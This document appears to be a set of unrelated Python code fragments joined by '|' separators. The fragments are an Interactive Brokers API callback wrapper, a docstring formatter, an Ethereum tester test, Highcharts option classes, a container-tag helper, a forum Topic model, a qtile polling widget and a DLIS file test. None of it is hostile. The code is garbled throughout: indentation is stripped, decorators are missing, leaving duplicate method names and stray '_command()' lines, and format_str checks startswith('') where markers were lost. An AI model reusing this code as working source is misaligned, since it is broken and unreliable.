def updateAccountValue(self, tag: str, val: str, currency: str, account: str):
key = (account, tag, currency, '')
acctVal = AccountValue(account, tag, val, currency, '')
self.accountValues[key] = acctVal
self.ib.accountValueEvent.emit(acctVal)
def accountDownloadEnd(self, _account: str):
self._endReq('accountValues')
def accountUpdateMulti(self, reqId: int, account: str, modelCode: str, tag: str, val: str, currency: str):
key = (account, tag, currency, modelCode)
acctVal = AccountValue(account, tag, val, currency, modelCode)
self.accountValues[key] = acctVal
self.ib.accountValueEvent.emit(acctVal)
def accountUpdateMultiEnd(self, reqId: int):
self._endReq(reqId)
def accountSummary(self, _reqId: int, account: str, tag: str, value: str, currency: str):
key = (account, tag, currency)
acctVal = AccountValue(account, tag, value, currency, '')
self.acctSummary[key] = acctVal
self.ib.accountSummaryEvent.emit(acctVal)
def accountSummaryEnd(self, reqId: int):
self._endReq(reqId)
def updatePortfolio(self, contract: Contract, posSize: float, marketPrice: float, marketValue: float, averageCost: float, unrealizedPNL: float, realizedPNL: float, account: str):
contract = Contract.create(**dataclassAsDict(contract))
portfItem = PortfolioItem(contract, posSize, marketPrice, marketValue, averageCost, unrealizedPNL, realizedPNL, account)
portfolioItems = self.portfolio[account]
if (posSize == 0):
portfolioItems.pop(contract.conId, None)
else:
portfolioItems[contract.conId] = portfItem
self._logger.info(f'updatePortfolio: {portfItem}')
self.ib.updatePortfolioEvent.emit(portfItem)
def position(self, account: str, contract: Contract, posSize: float, avgCost: float):
contract = Contract.create(**dataclassAsDict(contract))
position = Position(account, contract, posSize, avgCost)
positions = self.positions[account]
if (posSize == 0):
positions.pop(contract.conId, None)
else:
positions[contract.conId] = position
self._logger.info(f'position: {position}')
results = self._results.get('positions')
if (results is not None):
results.append(position)
self.ib.positionEvent.emit(position)
def positionEnd(self):
self._endReq('positions')
def positionMulti(self, reqId: int, account: str, modelCode: str, contract: Contract, pos: float, avgCost: float):
pass
def positionMultiEnd(self, reqId: int):
pass
def pnl(self, reqId: int, dailyPnL: float, unrealizedPnL: float, realizedPnL: float):
pnl = self.reqId2PnL.get(reqId)
if (not pnl):
return
pnl.dailyPnL = dailyPnL
pnl.unrealizedPnL = unrealizedPnL
pnl.realizedPnL = realizedPnL
self.ib.pnlEvent.emit(pnl)
def pnlSingle(self, reqId: int, pos: int, dailyPnL: float, unrealizedPnL: float, realizedPnL: float, value: float):
pnlSingle = self.reqId2PnlSingle.get(reqId)
if (not pnlSingle):
return
pnlSingle.position = pos
pnlSingle.dailyPnL = dailyPnL
pnlSingle.unrealizedPnL = unrealizedPnL
pnlSingle.realizedPnL = realizedPnL
pnlSingle.value = value
self.ib.pnlSingleEvent.emit(pnlSingle)
def openOrder(self, orderId: int, contract: Contract, order: Order, orderState: OrderState):
if order.whatIf:
if (orderState.initMarginChange != str(UNSET_DOUBLE)):
self._endReq(order.orderId, orderState)
else:
key = self.orderKey(order.clientId, order.orderId, order.permId)
trade = self.trades.get(key)
if trade:
trade.order.permId = order.permId
trade.order.totalQuantity = order.totalQuantity
trade.order.lmtPrice = order.lmtPrice
trade.order.auxPrice = order.auxPrice
trade.order.orderType = order.orderType
trade.order.orderRef = order.orderRef
else:
order = Order(**{k: v for (k, v) in dataclassAsDict(order).items() if (v != '?')})
contract = Contract.create(**dataclassAsDict(contract))
orderStatus = OrderStatus(orderId=orderId, status=orderState.status)
trade = Trade(contract, order, orderStatus, [], [])
self.trades[key] = trade
self._logger.info(f'openOrder: {trade}')
self.permId2Trade.setdefault(order.permId, trade)
results = self._results.get('openOrders')
if (results is None):
self.ib.openOrderEvent.emit(trade)
else:
results.append(trade)
self.ib.client.updateReqId((orderId + 1))
def openOrderEnd(self):
self._endReq('openOrders')
def completedOrder(self, contract: Contract, order: Order, orderState: OrderState):
contract = Contract.create(**dataclassAsDict(contract))
orderStatus = OrderStatus(orderId=order.orderId, status=orderState.status)
trade = Trade(contract, order, orderStatus, [], [])
self._results['completedOrders'].append(trade)
if (order.permId not in self.permId2Trade):
self.trades[order.permId] = trade
self.permId2Trade[order.permId] = trade
def completedOrdersEnd(self):
self._endReq('completedOrders')
def orderStatus(self, orderId: int, status: str, filled: float, remaining: float, avgFillPrice: float, permId: int, parentId: int, lastFillPrice: float, clientId: int, whyHeld: str, mktCapPrice: float=0.0):
key = self.orderKey(clientId, orderId, permId)
trade = self.trades.get(key)
if trade:
msg: Optional[str]
oldStatus = trade.orderStatus.status
new = dict(status=status, filled=filled, remaining=remaining, avgFillPrice=avgFillPrice, permId=permId, parentId=parentId, lastFillPrice=lastFillPrice, clientId=clientId, whyHeld=whyHeld, mktCapPrice=mktCapPrice)
curr = dataclassAsDict(trade.orderStatus)
isChanged = (curr != {**curr, **new})
if isChanged:
dataclassUpdate(trade.orderStatus, **new)
msg = ''
elif ((status == 'Submitted') and trade.log and (trade.log[(- 1)].message == 'Modify')):
msg = 'Modified'
else:
msg = None
if (msg is not None):
logEntry = TradeLogEntry(self.lastTime, status, msg)
trade.log.append(logEntry)
self._logger.info(f'orderStatus: {trade}')
self.ib.orderStatusEvent.emit(trade)
trade.statusEvent.emit(trade)
if (status != oldStatus):
if (status == OrderStatus.Filled):
trade.filledEvent.emit(trade)
elif (status == OrderStatus.Cancelled):
trade.cancelledEvent.emit(trade)
else:
self._logger.error('orderStatus: No order found for orderId %s and clientId %s', orderId, clientId)
def execDetails(self, reqId: int, contract: Contract, execution: Execution):
self._logger.info(f'execDetails {execution}')
if (execution.orderId == UNSET_INTEGER):
execution.orderId = 0
trade = self.permId2Trade.get(execution.permId)
if (not trade):
key = self.orderKey(execution.clientId, execution.orderId, execution.permId)
trade = self.trades.get(key)
if (trade and (contract == trade.contract)):
contract = trade.contract
else:
contract = Contract.create(**dataclassAsDict(contract))
execId = execution.execId
isLive = (reqId not in self._futures)
time = (self.lastTime if isLive else execution.time)
fill = Fill(contract, execution, CommissionReport(), time)
if (execId not in self.fills):
self.fills[execId] = fill
if trade:
trade.fills.append(fill)
logEntry = TradeLogEntry(time, trade.orderStatus.status, f'Fill {execution.shares}{execution.price}')
trade.log.append(logEntry)
if isLive:
self._logger.info(f'execDetails: {fill}')
self.ib.execDetailsEvent.emit(trade, fill)
trade.fillEvent(trade, fill)
if (not isLive):
self._results[reqId].append(fill)
def execDetailsEnd(self, reqId: int):
self._endReq(reqId)
def commissionReport(self, commissionReport: CommissionReport):
if (commissionReport.yield_ == UNSET_DOUBLE):
commissionReport.yield_ = 0.0
if (commissionReport.realizedPNL == UNSET_DOUBLE):
commissionReport.realizedPNL = 0.0
fill = self.fills.get(commissionReport.execId)
if fill:
report = dataclassUpdate(fill.commissionReport, commissionReport)
self._logger.info(f'commissionReport: {report}')
trade = self.permId2Trade.get(fill.execution.permId)
if trade:
self.ib.commissionReportEvent.emit(trade, fill, report)
trade.commissionReportEvent.emit(trade, fill, report)
else:
pass
else:
pass
def orderBound(self, reqId: int, apiClientId: int, apiOrderId: int):
pass
def contractDetails(self, reqId: int, contractDetails: ContractDetails):
self._results[reqId].append(contractDetails)
bondContractDetails = contractDetails
def contractDetailsEnd(self, reqId: int):
self._endReq(reqId)
def symbolSamples(self, reqId: int, contractDescriptions: List[ContractDescription]):
self._endReq(reqId, contractDescriptions)
def marketRule(self, marketRuleId: int, priceIncrements: List[PriceIncrement]):
self._endReq(f'marketRule-{marketRuleId}', priceIncrements)
def marketDataType(self, reqId: int, marketDataId: int):
ticker = self.reqId2Ticker.get(reqId)
if ticker:
ticker.marketDataType = marketDataId
def realtimeBar(self, reqId: int, time: int, open_: float, high: float, low: float, close: float, volume: float, wap: float, count: int):
dt = datetime.fromtimestamp(time, timezone.utc)
bar = RealTimeBar(dt, (- 1), open_, high, low, close, volume, wap, count)
bars = self.reqId2Subscriber.get(reqId)
if (bars is not None):
bars.append(bar)
self.ib.barUpdateEvent.emit(bars, True)
bars.updateEvent.emit(bars, True)
def historicalData(self, reqId: int, bar: BarData):
results = self._results.get(reqId)
if (results is not None):
bar.date = parseIBDatetime(bar.date)
results.append(bar)
def historicalDataEnd(self, reqId, _start: str, _end: str):
self._endReq(reqId)
def historicalDataUpdate(self, reqId: int, bar: BarData):
bars = self.reqId2Subscriber.get(reqId)
if (not bars):
return
bar.date = parseIBDatetime(bar.date)
lastDate = bars[(- 1)].date
if (bar.date < lastDate):
return
hasNewBar = ((len(bars) == 0) or (bar.date > lastDate))
if hasNewBar:
bars.append(bar)
elif (bars[(- 1)] != bar):
bars[(- 1)] = bar
else:
return
self.ib.barUpdateEvent.emit(bars, hasNewBar)
bars.updateEvent.emit(bars, hasNewBar)
def headTimestamp(self, reqId: int, headTimestamp: str):
try:
dt = parseIBDatetime(headTimestamp)
self._endReq(reqId, dt)
except ValueError as exc:
self._endReq(reqId, exc, False)
def historicalTicks(self, reqId: int, ticks: List[HistoricalTick], done: bool):
result = self._results.get(reqId)
if (result is not None):
result += ticks
if done:
self._endReq(reqId)
def historicalTicksBidAsk(self, reqId: int, ticks: List[HistoricalTickBidAsk], done: bool):
result = self._results.get(reqId)
if (result is not None):
result += ticks
if done:
self._endReq(reqId)
def historicalTicksLast(self, reqId: int, ticks: List[HistoricalTickLast], done: bool):
result = self._results.get(reqId)
if (result is not None):
result += ticks
if done:
self._endReq(reqId)
def priceSizeTick(self, reqId: int, tickType: int, price: float, size: float):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
self._logger.error(f'priceSizeTick: Unknown reqId: {reqId}')
return
if (tickType in (1, 66)):
if ((price == ticker.bid) and (size == ticker.bidSize)):
return
if (price != ticker.bid):
ticker.prevBid = ticker.bid
ticker.bid = price
if (size != ticker.bidSize):
ticker.prevBidSize = ticker.bidSize
ticker.bidSize = size
elif (tickType in (2, 67)):
if ((price == ticker.ask) and (size == ticker.askSize)):
return
if (price != ticker.ask):
ticker.prevAsk = ticker.ask
ticker.ask = price
if (size != ticker.askSize):
ticker.prevAskSize = ticker.askSize
ticker.askSize = size
elif (tickType in (4, 68)):
if (price != ticker.last):
ticker.prevLast = ticker.last
ticker.last = price
if (size != ticker.lastSize):
ticker.prevLastSize = ticker.lastSize
ticker.lastSize = size
elif (tickType in (6, 72)):
ticker.high = price
elif (tickType in (7, 73)):
ticker.low = price
elif (tickType in (9, 75)):
ticker.close = price
elif (tickType in (14, 76)):
ticker.open = price
elif (tickType == 15):
ticker.low13week = price
elif (tickType == 16):
ticker.high13week = price
elif (tickType == 17):
ticker.low26week = price
elif (tickType == 18):
ticker.high26week = price
elif (tickType == 19):
ticker.low52week = price
elif (tickType == 20):
ticker.high52week = price
elif (tickType == 35):
ticker.auctionPrice = price
elif (tickType == 37):
ticker.markPrice = price
elif (tickType in (50, 103)):
ticker.bidYield = price
elif (tickType in (51, 104)):
ticker.askYield = price
elif (tickType == 52):
ticker.lastYield = price
if (price or size):
tick = TickData(self.lastTime, tickType, price, size)
ticker.ticks.append(tick)
self.pendingTickers.add(ticker)
def tickSize(self, reqId: int, tickType: int, size: float):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
self._logger.error(f'tickSize: Unknown reqId: {reqId}')
return
price = (- 1.0)
if (tickType in (0, 69)):
if (size == ticker.bidSize):
return
price = ticker.bid
ticker.prevBidSize = ticker.bidSize
ticker.bidSize = size
elif (tickType in (3, 70)):
if (size == ticker.askSize):
return
price = ticker.ask
ticker.prevAskSize = ticker.askSize
ticker.askSize = size
elif (tickType in (5, 71)):
price = ticker.last
if isNan(price):
return
if (size != ticker.lastSize):
ticker.prevLastSize = ticker.lastSize
ticker.lastSize = size
elif (tickType in (8, 74)):
ticker.volume = size
elif (tickType == 21):
ticker.avVolume = size
elif (tickType == 27):
ticker.callOpenInterest = size
elif (tickType == 28):
ticker.putOpenInterest = size
elif (tickType == 29):
ticker.callVolume = size
elif (tickType == 30):
ticker.putVolume = size
elif (tickType == 34):
ticker.auctionVolume = size
elif (tickType == 36):
ticker.auctionImbalance = size
elif (tickType == 61):
ticker.regulatoryImbalance = size
elif (tickType == 86):
ticker.futuresOpenInterest = size
elif (tickType == 87):
ticker.avOptionVolume = size
elif (tickType == 89):
ticker.shortableShares = size
if (price or size):
tick = TickData(self.lastTime, tickType, price, size)
ticker.ticks.append(tick)
self.pendingTickers.add(ticker)
def tickSnapshotEnd(self, reqId: int):
self._endReq(reqId)
def tickByTickAllLast(self, reqId: int, tickType: int, time: int, price: float, size: float, tickAttribLast: TickAttribLast, exchange, specialConditions):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
self._logger.error(f'tickByTickAllLast: Unknown reqId: {reqId}')
return
if (price != ticker.last):
ticker.prevLast = ticker.last
ticker.last = price
if (size != ticker.lastSize):
ticker.prevLastSize = ticker.lastSize
ticker.lastSize = size
tick = TickByTickAllLast(tickType, self.lastTime, price, size, tickAttribLast, exchange, specialConditions)
ticker.tickByTicks.append(tick)
self.pendingTickers.add(ticker)
def tickByTickBidAsk(self, reqId: int, time: int, bidPrice: float, askPrice: float, bidSize: float, askSize: float, tickAttribBidAsk: TickAttribBidAsk):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
self._logger.error(f'tickByTickBidAsk: Unknown reqId: {reqId}')
return
if (bidPrice != ticker.bid):
ticker.prevBid = ticker.bid
ticker.bid = bidPrice
if (bidSize != ticker.bidSize):
ticker.prevBidSize = ticker.bidSize
ticker.bidSize = bidSize
if (askPrice != ticker.ask):
ticker.prevAsk = ticker.ask
ticker.ask = askPrice
if (askSize != ticker.askSize):
ticker.prevAskSize = ticker.askSize
ticker.askSize = askSize
tick = TickByTickBidAsk(self.lastTime, bidPrice, askPrice, bidSize, askSize, tickAttribBidAsk)
ticker.tickByTicks.append(tick)
self.pendingTickers.add(ticker)
def tickByTickMidPoint(self, reqId: int, time: int, midPoint: float):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
self._logger.error(f'tickByTickMidPoint: Unknown reqId: {reqId}')
return
tick = TickByTickMidPoint(self.lastTime, midPoint)
ticker.tickByTicks.append(tick)
self.pendingTickers.add(ticker)
def tickString(self, reqId: int, tickType: int, value: str):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
return
try:
if (tickType == 32):
ticker.bidExchange = value
elif (tickType == 33):
ticker.askExchange = value
elif (tickType == 84):
ticker.lastExchange = value
elif (tickType == 47):
d = dict((t.split('=') for t in value.split(';') if t))
for (k, v) in d.items():
with suppress(ValueError):
if (v == '-99999.99'):
v = 'nan'
d[k] = float(v)
d[k] = int(v)
ticker.fundamentalRatios = FundamentalRatios(**d)
elif (tickType in (48, 77)):
(priceStr, sizeStr, rtTime, volume, vwap, _) = value.split(';')
if volume:
if (tickType == 48):
ticker.rtVolume = float(volume)
elif (tickType == 77):
ticker.rtTradeVolume = float(volume)
if vwap:
ticker.vwap = float(vwap)
if rtTime:
ticker.rtTime = datetime.fromtimestamp((int(rtTime) / 1000), timezone.utc)
if (priceStr == ''):
return
price = float(priceStr)
size = float(sizeStr)
if (price and size):
if (ticker.prevLast != ticker.last):
ticker.prevLast = ticker.last
ticker.last = price
if (ticker.prevLastSize != ticker.lastSize):
ticker.prevLastSize = ticker.lastSize
ticker.lastSize = size
tick = TickData(self.lastTime, tickType, price, size)
ticker.ticks.append(tick)
elif (tickType == 59):
(past12, next12, nextDate, nextAmount) = value.split(',')
ticker.dividends = Dividends((float(past12) if past12 else None), (float(next12) if next12 else None), (parseIBDatetime(nextDate) if nextDate else None), (float(nextAmount) if nextAmount else None))
self.pendingTickers.add(ticker)
except ValueError:
self._logger.error(f'tickString with tickType {tickType}: malformed value: {value!r}')
def tickGeneric(self, reqId: int, tickType: int, value: float):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
return
try:
value = float(value)
except ValueError:
self._logger.error(f'genericTick: malformed value: {value!r}')
return
if (tickType == 23):
ticker.histVolatility = value
elif (tickType == 24):
ticker.impliedVolatility = value
elif (tickType == 31):
ticker.indexFuturePremium = value
elif (tickType == 49):
ticker.halted = value
elif (tickType == 54):
ticker.tradeCount = value
elif (tickType == 55):
ticker.tradeRate = value
elif (tickType == 56):
ticker.volumeRate = value
elif (tickType == 58):
ticker.rtHistVolatility = value
tick = TickData(self.lastTime, tickType, value, 0)
ticker.ticks.append(tick)
self.pendingTickers.add(ticker)
def tickReqParams(self, reqId: int, minTick: float, bboExchange: str, snapshotPermissions: int):
ticker = self.reqId2Ticker.get(reqId)
if (not ticker):
return
ticker.minTick = minTick
ticker.bboExchange = bboExchange
ticker.snapshotPermissions = snapshotPermissions
def smartComponents(self, reqId, components):
self._endReq(reqId, components)
def mktDepthExchanges(self, depthMktDataDescriptions: List[DepthMktDataDescription]):
self._endReq('mktDepthExchanges', depthMktDataDescriptions)
def updateMktDepth(self, reqId: int, position: int, operation: int, side: int, price: float, size: float):
self.updateMktDepthL2(reqId, position, '', operation, side, price, size)
def updateMktDepthL2(self, reqId: int, position: int, marketMaker: str, operation: int, side: int, price: float, size: float, isSmartDepth: bool=False):
ticker = self.reqId2Ticker[reqId]
dom = (ticker.domBids if side else ticker.domAsks)
if (operation == 0):
dom.insert(position, DOMLevel(price, size, marketMaker))
elif (operation == 1):
dom[position] = DOMLevel(price, size, marketMaker)
elif (operation == 2):
if (position < len(dom)):
level = dom.pop(position)
price = level.price
size = 0
tick = MktDepthData(self.lastTime, position, marketMaker, operation, side, price, size)
ticker.domTicks.append(tick)
self.pendingTickers.add(ticker)
def tickOptionComputation(self, reqId: int, tickType: int, tickAttrib: int, impliedVol: float, delta: float, optPrice: float, pvDividend: float, gamma: float, vega: float, theta: float, undPrice: float):
comp = OptionComputation(tickAttrib, (impliedVol if (impliedVol != (- 1)) else None), (delta if (delta != (- 2)) else None), (optPrice if (optPrice != (- 1)) else None), (pvDividend if (pvDividend != (- 1)) else None), (gamma if (gamma != (- 2)) else None), (vega if (vega != (- 2)) else vega), (theta if (theta != (- 2)) else theta), (undPrice if (undPrice != (- 1)) else None))
ticker = self.reqId2Ticker.get(reqId)
if ticker:
if (tickType in (10, 80)):
ticker.bidGreeks = comp
elif (tickType in (11, 81)):
ticker.askGreeks = comp
elif (tickType in (12, 82)):
ticker.lastGreeks = comp
elif (tickType in (13, 83)):
ticker.modelGreeks = comp
self.pendingTickers.add(ticker)
elif (reqId in self._futures):
self._endReq(reqId, comp)
else:
self._logger.error(f'tickOptionComputation: Unknown reqId: {reqId}')
def deltaNeutralValidation(self, reqId: int, dnc: DeltaNeutralContract):
pass
def fundamentalData(self, reqId: int, data: str):
self._endReq(reqId, data)
def scannerParameters(self, xml: str):
self._endReq('scannerParams', xml)
def scannerData(self, reqId: int, rank: int, contractDetails: ContractDetails, distance: str, benchmark: str, projection: str, legsStr: str):
data = ScanData(rank, contractDetails, distance, benchmark, projection, legsStr)
dataList = self.reqId2Subscriber.get(reqId)
if (dataList is None):
dataList = self._results.get(reqId)
if (dataList is not None):
if (rank == 0):
dataList.clear()
dataList.append(data)
def scannerDataEnd(self, reqId: int):
dataList = self._results.get(reqId)
if (dataList is not None):
self._endReq(reqId)
else:
dataList = self.reqId2Subscriber.get(reqId)
if (dataList is not None):
self.ib.scannerDataEvent.emit(dataList)
dataList.updateEvent.emit(dataList)
def histogramData(self, reqId: int, items: List[HistogramData]):
result = [HistogramData(item.price, item.count) for item in items]
self._endReq(reqId, result)
def securityDefinitionOptionParameter(self, reqId: int, exchange: str, underlyingConId: int, tradingClass: str, multiplier: str, expirations: List[str], strikes: List[float]):
chain = OptionChain(exchange, underlyingConId, tradingClass, multiplier, expirations, strikes)
self._results[reqId].append(chain)
def securityDefinitionOptionParameterEnd(self, reqId: int):
self._endReq(reqId)
def newsProviders(self, newsProviders: List[NewsProvider]):
newsProviders = [NewsProvider(code=p.code, name=p.name) for p in newsProviders]
self._endReq('newsProviders', newsProviders)
def tickNews(self, _reqId: int, timeStamp: int, providerCode: str, articleId: str, headline: str, extraData: str):
news = NewsTick(timeStamp, providerCode, articleId, headline, extraData)
self.newsTicks.append(news)
self.ib.tickNewsEvent.emit(news)
def newsArticle(self, reqId: int, articleType: int, articleText: str):
article = NewsArticle(articleType, articleText)
self._endReq(reqId, article)
def historicalNews(self, reqId: int, time: str, providerCode: str, articleId: str, headline: str):
dt = parseIBDatetime(time)
dt = cast(datetime, dt)
article = HistoricalNews(dt, providerCode, articleId, headline)
self._results[reqId].append(article)
def historicalNewsEnd(self, reqId, _hasMore: bool):
self._endReq(reqId)
def updateNewsBulletin(self, msgId: int, msgType: int, message: str, origExchange: str):
bulletin = NewsBulletin(msgId, msgType, message, origExchange)
self.msgId2NewsBulletin[msgId] = bulletin
self.ib.newsBulletinEvent.emit(bulletin)
def receiveFA(self, _faDataType: int, faXmlData: str):
self._endReq('requestFA', faXmlData)
def currentTime(self, time: int):
dt = datetime.fromtimestamp(time, timezone.utc)
self._endReq('currentTime', dt)
def tickEFP(self, reqId: int, tickType: int, basisPoints: float, formattedBasisPoints: str, totalDividends: float, holdDays: int, futureLastTradeDate: str, dividendImpact: float, dividendsToLastTradeDate: float):
pass
def historicalSchedule(self, reqId: int, startDateTime: str, endDateTime: str, timeZone: str, sessions: List[HistoricalSession]):
schedule = HistoricalSchedule(startDateTime, endDateTime, timeZone, sessions)
self._endReq(reqId, schedule)
def wshMetaData(self, reqId: int, dataJson: str):
self.ib.wshMetaEvent.emit(dataJson)
self._endReq(reqId, dataJson)
def wshEventData(self, reqId: int, dataJson: str):
self.ib.wshEvent.emit(dataJson)
self._endReq(reqId, dataJson)
def userInfo(self, reqId: int, whiteBrandingId: str):
self._endReq(reqId)
def softDollarTiers(self, reqId: int, tiers: List[SoftDollarTier]):
pass
def familyCodes(self, familyCodes: List[FamilyCode]):
pass
def error(self, reqId: int, errorCode: int, errorString: str, advancedOrderRejectJson: str):
isRequest = (reqId in self._futures)
trade = self.trades.get((self.clientId, reqId))
warningCodes = {110, 165, 202, 399, 404, 434, 492, 10167}
isWarning = ((errorCode in warningCodes) or (2100 <= errorCode < 2200))
if ((errorCode == 110) and isRequest):
isWarning = False
if ((errorCode == 110) and trade and (trade.orderStatus.status == OrderStatus.PendingSubmit)):
isWarning = False
msg = f"{('Warning' if isWarning else 'Error')} {errorCode}, reqId {reqId}: {errorString}"
contract = self._reqId2Contract.get(reqId)
if contract:
msg += f', contract: {contract}'
if isWarning:
self._logger.info(msg)
else:
self._logger.error(msg)
if isRequest:
if self.ib.RaiseRequestErrors:
error = RequestError(reqId, errorCode, errorString)
self._endReq(reqId, error, success=False)
else:
self._endReq(reqId)
elif trade:
if advancedOrderRejectJson:
trade.advancedError = advancedOrderRejectJson
if (not trade.isDone()):
status = trade.orderStatus.status = OrderStatus.Cancelled
logEntry = TradeLogEntry(self.lastTime, status, msg, errorCode)
trade.log.append(logEntry)
self._logger.warning(f'Canceled order: {trade}')
self.ib.orderStatusEvent.emit(trade)
trade.statusEvent.emit(trade)
trade.cancelledEvent.emit(trade)
if (errorCode == 165):
dataList = self.reqId2Subscriber.get(reqId)
if dataList:
dataList.clear()
dataList.updateEvent.emit(dataList)
elif (errorCode == 317):
ticker = self.reqId2Ticker.get(reqId)
if ticker:
ticker.domTicks += [MktDepthData(self.lastTime, 0, '', 2, 0, level.price, 0) for level in ticker.domAsks]
ticker.domTicks += [MktDepthData(self.lastTime, 0, '', 2, 1, level.price, 0) for level in ticker.domBids]
ticker.domAsks.clear()
ticker.domBids.clear()
self.pendingTickers.add(ticker)
elif (errorCode == 10225):
bars = self.reqId2Subscriber.get(reqId)
if isinstance(bars, RealTimeBarList):
self.ib.client.cancelRealTimeBars(reqId)
self.ib.client.reqRealTimeBars(reqId, bars.contract, bars.barSize, bars.whatToShow, bars.useRTH, bars.realTimeBarsOptions)
elif isinstance(bars, BarDataList):
self.ib.client.cancelHistoricalData(reqId)
self.ib.client.reqHistoricalData(reqId, bars.contract, bars.endDateTime, bars.durationStr, bars.barSizeSetting, bars.whatToShow, bars.useRTH, bars.formatDate, bars.keepUpToDate, bars.chartOptions)
self.ib.errorEvent.emit(reqId, errorCode, errorString, contract)
def tcpDataArrived(self):
self.lastTime = datetime.now(timezone.utc)
for ticker in self.pendingTickers:
ticker.ticks = []
ticker.tickByTicks = []
ticker.domTicks = []
self.pendingTickers = set()
def tcpDataProcessed(self):
self.ib.updateEvent.emit()
if self.pendingTickers:
for ticker in self.pendingTickers:
ticker.time = self.lastTime
ticker.updateEvent.emit(ticker)
self.ib.pendingTickersEvent.emit(self.pendingTickers) |
def format_str(s):
s = s.replace('/*', '')
s = s.replace('*/', '')
s = s.replace('*', '')
lines = s.split('\n')
lines = lines[1:(- 1)]
for i in range(len(lines)):
lines[i] = lines[i].lstrip()
docstring = []
p = ''
params = False
for i in range(len(lines)):
if (lines[i].isspace() or (lines[i] == '')):
docstring.append('\n'.join(wrap(p, 76)))
docstring.append('')
p = ''
elif lines[i].startswith('\\note'):
if (p != ''):
docstring.append('\n'.join(wrap(p, 76)))
docstring.append('')
docstring.append('Note:')
p = lines[i][6:]
elif lines[i].startswith(''):
if (p != ''):
docstring.append('\n'.join(wrap(p, 76)))
docstring.append('')
if (not params):
docstring.append('Inputs:')
p = lines[i][6:].lstrip()
elif lines[i].startswith(''):
if (p != ''):
docstring.append('\n'.join(wrap(p, 76)))
docstring.append('Raises:')
p = ''
elif lines[i].startswith('- \\ref'):
p += lines[i][7:]
else:
p = (p + lines[i])
return '\n'.join(docstring) |
def test_apply_withdrawals():
if (not is_supported_pyevm_version_available()):
pytest.skip('PyEVM is not available')
backend = PyEVMBackend(vm_configuration=((0, ShanghaiVM),))
tester = EthereumTester(backend=backend)
withdrawals = [{'index': 0, 'validator_index': 0, 'address': f"0x{('01' * 20)}", 'amount': 100}, {'index': ((2 ** 64) - 1), 'validator_index': ((2 ** 64) - 1), 'address': (b'\x02' * 20), 'amount': ((2 ** 64) - 1)}]
backend.apply_withdrawals(withdrawals)
mined_block = tester.get_block_by_number('latest')
assert ((mined_block['withdrawals'] == normalize_withdrawal(withdrawal)) for withdrawal in withdrawals)
assert (backend.get_balance((b'\x01' * 20)) == (100 * (10 ** 9)))
assert (backend.get_balance((b'\x02' * 20)) == (((2 ** 64) - 1) * (10 ** 9)))
assert (mined_block['withdrawals_root'] == '0xbb49834f60cdfb1a3303cc0f80984c4c7533ecf326bc343d8109127e') |
class OptionSeriesLineZones(Options):
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get(None)
def color(self, text: str):
self._config(text, js_type=False)
def dashStyle(self):
return self._config_get(None)
def dashStyle(self, text: str):
self._config(text, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False) |
def get_container_tag_from_ref(ref: str) -> str:
if (not ref.startswith('refs/')):
raise SystemExit(f'expected an absolute ref, e.g. `refs/heads/master`, but got `{ref}`')
elif (ref == 'refs/heads/master'):
return 'latest'
elif ref.startswith('refs/heads/release/'):
return ref[19:]
else:
raise SystemExit(f'cannot determine container tag from ref `{ref}`') |
class Topic(BaseObject):
def __init__(self, api=None, body=None, created_at=None, forum_id=None, id=None, locked=None, pinned=None, position=None, search_phrases=None, submitter_id=None, tags=None, title=None, topic_type=None, updated_at=None, updater_id=None, url=None, **kwargs):
self.api = api
self.body = body
self.created_at = created_at
self.forum_id = forum_id
self.id = id
self.locked = locked
self.pinned = pinned
self.position = position
self.search_phrases = search_phrases
self.submitter_id = submitter_id
self.tags = tags
self.title = title
self.topic_type = topic_type
self.updated_at = updated_at
self.updater_id = updater_id
self.url = url
for (key, value) in kwargs.items():
setattr(self, key, value)
for key in self.to_dict():
if (getattr(self, key) is None):
try:
self._dirty_attributes.remove(key)
except KeyError:
continue
def created(self):
if self.created_at:
return dateutil.parser.parse(self.created_at)
def created(self, created):
if created:
self.created_at = created
def forum(self):
if (self.api and self.forum_id):
return self.api._get_forum(self.forum_id)
def forum(self, forum):
if forum:
self.forum_id = forum.id
self._forum = forum
def submitter(self):
if (self.api and self.submitter_id):
return self.api._get_user(self.submitter_id)
def submitter(self, submitter):
if submitter:
self.submitter_id = submitter.id
self._submitter = submitter
def updated(self):
if self.updated_at:
return dateutil.parser.parse(self.updated_at)
def updated(self, updated):
if updated:
self.updated_at = updated
def updater(self):
if (self.api and self.updater_id):
return self.api._get_user(self.updater_id)
def updater(self, updater):
if updater:
self.updater_id = updater.id
self._updater = updater |
class ContinuousPoll(_TextBox):
defaults = [('cmd', None, 'Command to execute.'), ('parse_line', None, 'Function to parse output of line. See docs for more.')]
def __init__(self, **config):
_TextBox.__init__(self, **config)
self.add_defaults(ContinuousPoll.defaults)
self._process = None
self._finalized = False
async def _config_async(self):
(await self.run())
async def run(self):
if (not self.cmd):
return
self._process = (await asyncio.create_subprocess_shell(self.cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.DEVNULL, preexec_fn=os.setsid))
while (not self._finalized):
out = (await self._process.stdout.readline())
if (not out):
self.update('')
self._process = None
break
if self.parse_line:
output = self.parse_line(out)
else:
output = out.decode().strip()
self.qtile.call_soon_threadsafe(self.update, output)
def _stop(self, kill=False):
os.killpg(os.getpgid(self._process.pid), (signal.SIGKILL if kill else signal.SIGTERM))
self.update('')
_command()
def stop_process(self, kill=False):
if (self._process is None):
return
self._stop(kill=kill)
_command()
def run_process(self, command=None):
if (self._process is not None):
logger.warning('Cannot start process while another is running.')
return
if (command is not None):
self.cmd = command
asyncio.create_task(self.run())
def finalize(self):
self._finalized = True
self.stop_process()
_TextBox.finalize(self) |
def test_repcode_different_no_value(tmpdir, merge_files_oneLR, assert_log, assert_info):
path = os.path.join(str(tmpdir), 'different-repcode-no-value.dlis')
content = ['data/chap3/start.dlis.part', 'data/chap3/template/default.dlis.part', 'data/chap3/object/object.dlis.part', 'data/chap3/objattr/csingle-novalue.dlis.part']
merge_files_oneLR(path, content)
